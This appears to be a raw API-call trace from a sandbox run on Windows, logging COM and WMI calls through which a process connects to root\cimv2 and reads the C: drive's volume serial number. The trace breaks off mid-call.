WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db38 | out: ppvObject=0x949db38*=0xbdefe0) returned 0x0 [0150.256] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdefe0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949db40 | out: pCid=0x949db40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0150.257] WbemDefPath:IUnknown:Release (This=0xbdefe0) returned 0x3 [0150.257] CoGetContextToken (in: pToken=0x949db98 | out: pToken=0x949db98) returned 0x0 [0150.257] CoGetContextToken (in: pToken=0x949dfa0 | out: pToken=0x949dfa0) returned 0x0 [0150.257] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e030 | out: ppvObject=0x949e030*=0x0) returned 0x80004002 [0150.257] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x2 [0150.257] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x1 [0150.257] CoGetContextToken (in: pToken=0x949e928 | out: pToken=0x949e928) returned 0x0 [0150.257] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0150.257] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x949e958*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x6025370) returned 0x0 [0150.257] WbemDefPath:IUnknown:AddRef (This=0x6025370) returned 0x3 [0150.257] WbemDefPath:IUnknown:Release (This=0x6025370) returned 0x2 [0150.257] WbemDefPath:IWbemPath:SetText (This=0x6025370, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025370, puCount=0x949eadc | out: puCount=0x949eadc*=0x0) returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetText (in: This=0x6025370, lFlags=2, puBuffLength=0x949ead8*=0x0, pszText=0x0 | out: puBuffLength=0x949ead8*=0x20, pszText=0x0) returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetText (in: This=0x6025370, lFlags=2, puBuffLength=0x949ead8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ead8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025370, uRequestedInfo=0x0, puResponse=0x949eae4 | out: puResponse=0x949eae4*=0xc19) returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025370, puCount=0x949eadc | out: puCount=0x949eadc*=0x0) returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025370, uRequestedInfo=0x0, puResponse=0x949eae4 | out: puResponse=0x949eae4*=0xc19) returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025370, uRequestedInfo=0x0, puResponse=0x949eae4 | out: puResponse=0x949eae4*=0xc19) returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025370, puCount=0x949ea5c | out: puCount=0x949ea5c*=0x0) returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949ea48 | out: puCount=0x949ea48*=0x2) returned 0x0 [0150.257] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949ea44*=0x0, pszText=0x0 | out: puBuffLength=0x949ea44*=0xf, pszText=0x0) returned 0x0 [0150.258] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949ea44*=0xf, pszText="00000000000000" | out: puBuffLength=0x949ea44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.258] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e9f8 | out: ppv=0x949e9f8*=0xb51e34) returned 0x0 [0150.258] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e9f0 | out: pAptType=0x949e9f0*=1) returned 0x0 [0150.258] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e9f4 | out: ppvObject=0x949e9f4*=0x0) returned 0x80004002 [0150.258] IUnknown:Release (This=0xb51e34) returned 0x1 [0150.259] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e360 | out: ppv=0x949e360*=0x60249b0) returned 0x0 [0150.259] WbemDefPath:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e578 | out: ppvObject=0x949e578*=0x0) returned 0x80004002 [0150.259] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60249b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e58c | out: ppvObject=0x949e58c*=0x6025300) returned 0x0 [0150.259] WbemDefPath:IUnknown:Release (This=0x60249b0) returned 0x0 [0150.259] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1ac | out: ppvObject=0x949e1ac*=0x6025300) returned 0x0 [0150.259] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e168 | out: ppvObject=0x949e168*=0x0) returned 0x80004002 [0150.259] WbemDefPath:IUnknown:AddRef (This=0x6025300) returned 0x3 [0150.259] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dac4 | out: ppvObject=0x949dac4*=0x0) returned 0x80004002 [0150.259] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da74 | out: ppvObject=0x949da74*=0x0) returned 0x80004002 [0150.259] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da80 | out: ppvObject=0x949da80*=0xbdf150) returned 0x0 [0150.260] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf150, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949da88 | out: pCid=0x949da88*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0150.260] WbemDefPath:IUnknown:Release (This=0xbdf150) returned 0x3 [0150.260] CoGetContextToken (in: pToken=0x949dae0 | out: pToken=0x949dae0) returned 0x0 [0150.260] CoGetContextToken (in: pToken=0x949dee8 | out: pToken=0x949dee8) returned 0x0 [0150.260] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df78 | out: ppvObject=0x949df78*=0x0) returned 0x80004002 [0150.260] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x2 [0150.260] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x1 [0150.260] CoGetContextToken (in: pToken=0x949e870 | out: pToken=0x949e870) returned 0x0 [0150.260] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0150.260] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025300, riid=0x949e8a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e89c | out: ppvObject=0x949e89c*=0x6025300) returned 0x0 [0150.260] WbemDefPath:IUnknown:AddRef (This=0x6025300) returned 0x3 [0150.260] WbemDefPath:IUnknown:Release (This=0x6025300) returned 0x2 [0150.260] WbemDefPath:IWbemPath:SetText (This=0x6025300, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0150.260] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025300, puCount=0x949ea20 | out: puCount=0x949ea20*=0x2) returned 0x0 [0150.260] WbemDefPath:IWbemPath:GetText (in: This=0x6025300, lFlags=4, puBuffLength=0x949ea1c*=0x0, pszText=0x0 | out: puBuffLength=0x949ea1c*=0xf, pszText=0x0) returned 0x0 [0150.260] WbemDefPath:IWbemPath:GetText (in: This=0x6025300, lFlags=4, puBuffLength=0x949ea1c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949ea1c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.260] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea20 | out: ppv=0x949ea20*=0xb51e34) returned 0x0 [0150.260] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea18 | out: pAptType=0x949ea18*=1) returned 0x0 [0150.261] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea1c | out: ppvObject=0x949ea1c*=0x0) returned 0x80004002 [0150.261] IUnknown:Release (This=0xb51e34) returned 0x1 [0150.325] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e640 | out: ppv=0x949e640*=0x6027180) returned 0x0 [0150.325] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e858 | out: ppvObject=0x949e858*=0x0) returned 0x80004002 [0150.326] WbemLocator:IClassFactory:CreateInstance (in: This=0x6027180, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e86c | out: ppvObject=0x949e86c*=0x60249f0) returned 0x0 [0150.326] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x0 [0150.326] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e48c | out: ppvObject=0x949e48c*=0x60249f0) returned 0x0 [0150.326] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e448 | out: ppvObject=0x949e448*=0x0) returned 0x80004002 [0150.326] WbemLocator:IUnknown:AddRef (This=0x60249f0) returned 0x3 [0150.326] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dda4 | out: ppvObject=0x949dda4*=0x0) returned 0x80004002 [0150.326] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dd54 | out: ppvObject=0x949dd54*=0x0) returned 0x80004002 [0150.326] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd60 | out: ppvObject=0x949dd60*=0x0) returned 0x80004002 [0150.326] CoGetContextToken (in: pToken=0x949ddc0 | out: pToken=0x949ddc0) returned 0x0 [0150.326] CoGetContextToken (in: pToken=0x949e1c8 | out: pToken=0x949e1c8) returned 0x0 [0150.326] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e258 | out: ppvObject=0x949e258*=0x0) returned 0x80004002 [0150.326] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x2 [0150.326] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x1 [0150.326] CoGetContextToken (in: pToken=0x949e838 | out: pToken=0x949e838) returned 0x0 [0150.326] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0150.326] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x949e868*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e864 | out: ppvObject=0x949e864*=0x60249f0) returned 0x0 [0150.327] WbemLocator:IUnknown:AddRef (This=0x60249f0) returned 0x3 [0150.327] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x2 [0150.327] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025300, puCount=0x949e9fc | out: puCount=0x949e9fc*=0x2) returned 0x0 [0150.327] WbemDefPath:IWbemPath:GetText (in: This=0x6025300, lFlags=8, puBuffLength=0x949e9f8*=0x0, pszText=0x0 | out: puBuffLength=0x949e9f8*=0xf, pszText=0x0) returned 0x0 [0150.327] WbemDefPath:IWbemPath:GetText (in: This=0x6025300, lFlags=8, puBuffLength=0x949e9f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.327] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e8d4 | out: ppv=0x949e8d4*=0x6024a20) returned 0x0 [0150.327] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024a20, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e968 | out: ppNamespace=0x949e968*=0x602453c) returned 0x0 [0152.805] WbemLocator:IUnknown:QueryInterface (in: This=0x602453c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e804 | out: ppvObject=0x949e804*=0xb5b134) returned 0x0 [0152.805] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b134, pProxy=0x602453c, pAuthnSvc=0x949e854, pAuthzSvc=0x949e850, pServerPrincName=0x949e848, pAuthnLevel=0x949e84c, pImpLevel=0x949e83c, pAuthInfo=0x949e840, pCapabilites=0x949e844 | out: pAuthnSvc=0x949e854*=0xa, pAuthzSvc=0x949e850*=0x0, pServerPrincName=0x949e848, pAuthnLevel=0x949e84c*=0x6, pImpLevel=0x949e83c*=0x2, pAuthInfo=0x949e840, pCapabilites=0x949e844*=0x1) returned 0x0 [0152.805] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x1 [0152.805] WbemLocator:IUnknown:QueryInterface (in: This=0x602453c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7f8 | out: ppvObject=0x949e7f8*=0xb5b154) returned 0x0 [0152.805] WbemLocator:IUnknown:QueryInterface (in: This=0x602453c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7f4 | out: ppvObject=0x949e7f4*=0xb5b134) returned 0x0 [0152.805] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b134, pProxy=0x602453c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0152.805] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x2 [0152.805] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0152.805] CoTaskMemFree (pv=0x67884e8) [0152.806] WbemLocator:IUnknown:Release (This=0x6024a20) returned 0x0 [0152.806] WbemLocator:IUnknown:QueryInterface (in: This=0x602453c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3f4 | out: ppvObject=0x949e3f4*=0xb5b154) returned 0x0 [0152.806] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3b0 | out: ppvObject=0x949e3b0*=0x0) returned 0x80004002 [0152.807] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e1cc | out: ppvObject=0x949e1cc*=0x0) returned 0x80004002 [0152.808] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0152.808] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd0c | out: ppvObject=0x949dd0c*=0x0) returned 0x80004002 [0152.808] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcbc | out: ppvObject=0x949dcbc*=0x0) returned 0x80004002 [0152.808] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc8 | out: ppvObject=0x949dcc8*=0xb5b0b4) returned 0x0 [0152.808] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b0b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dcd0 | out: pCid=0x949dcd0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0152.808] WbemLocator:IUnknown:Release (This=0xb5b0b4) returned 0x3 [0152.808] CoGetContextToken (in: pToken=0x949dd28 | out: pToken=0x949dd28) returned 0x0 [0152.809] CoGetContextToken (in: pToken=0x949e130 | out: pToken=0x949e130) returned 0x0 [0152.809] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c0 | out: ppvObject=0x949e1c0*=0xb5b13c) returned 0x0 [0152.809] WbemLocator:IRpcOptions:Query (in: This=0xb5b13c, pPrx=0xb5b154, dwProperty=2, pdwValue=0x949e1e8 | out: pdwValue=0x949e1e8) returned 0x80004002 [0152.809] WbemLocator:IUnknown:Release (This=0xb5b13c) returned 0x3 [0152.809] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0152.809] CoGetContextToken (in: pToken=0x949e708 | out: pToken=0x949e708) returned 0x0 [0152.809] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0152.809] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x949e738*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e734 | out: ppvObject=0x949e734*=0x602453c) returned 0x0 [0152.809] WbemLocator:IUnknown:AddRef (This=0x602453c) returned 0x4 [0152.809] WbemLocator:IUnknown:Release (This=0x602453c) returned 0x3 [0152.809] WbemLocator:IUnknown:Release (This=0x602453c) returned 0x2 [0152.809] SysStringLen (param_1=0x0) returned 0x0 [0152.809] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025370, puCount=0x949eacc | out: puCount=0x949eacc*=0x0) returned 0x0 [0152.809] WbemDefPath:IWbemPath:GetText (in: This=0x6025370, lFlags=2, puBuffLength=0x949eac8*=0x0, pszText=0x0 | out: puBuffLength=0x949eac8*=0x20, pszText=0x0) returned 0x0 [0152.809] WbemDefPath:IWbemPath:GetText (in: This=0x6025370, lFlags=2, puBuffLength=0x949eac8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949eac8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.809] CoGetContextToken (in: pToken=0x949e738 | out: pToken=0x949e738) returned 0x0 [0152.809] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0152.809] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5cc | out: ppvObject=0x949e5cc*=0xb5b154) returned 0x0 [0152.809] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x3 [0152.809] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0152.809] WbemDefPath:IWbemPath:GetText (in: This=0x6025370, lFlags=2, puBuffLength=0x949ead0*=0x0, pszText=0x0 | out: puBuffLength=0x949ead0*=0x20, pszText=0x0) returned 0x0 [0152.810] WbemDefPath:IWbemPath:GetText (in: This=0x6025370, lFlags=2, puBuffLength=0x949ead0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ead0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.810] IWbemServices:GetObject (in: This=0x602453c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949ea84*=0x0, ppCallResult=0x0 | out: ppObject=0x949ea84*=0x6028648, ppCallResult=0x0) returned 0x0 [0153.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025300, puCount=0x949ea84 | out: puCount=0x949ea84*=0x2) returned 0x0 [0153.106] WbemDefPath:IWbemPath:GetText (in: This=0x6025300, lFlags=4, puBuffLength=0x949ea80*=0x0, pszText=0x0 | out: puBuffLength=0x949ea80*=0xf, pszText=0x0) returned 0x0 [0153.107] WbemDefPath:IWbemPath:GetText (in: This=0x6025300, lFlags=4, puBuffLength=0x949ea80*=0xf, pszText="00000000000000" | out: puBuffLength=0x949ea80*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0153.107] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949ea80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36ca9b8*=0, plFlavor=0x36ca9bc*=0 | out: pVal=0x949ea80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36ca9b8*=8, 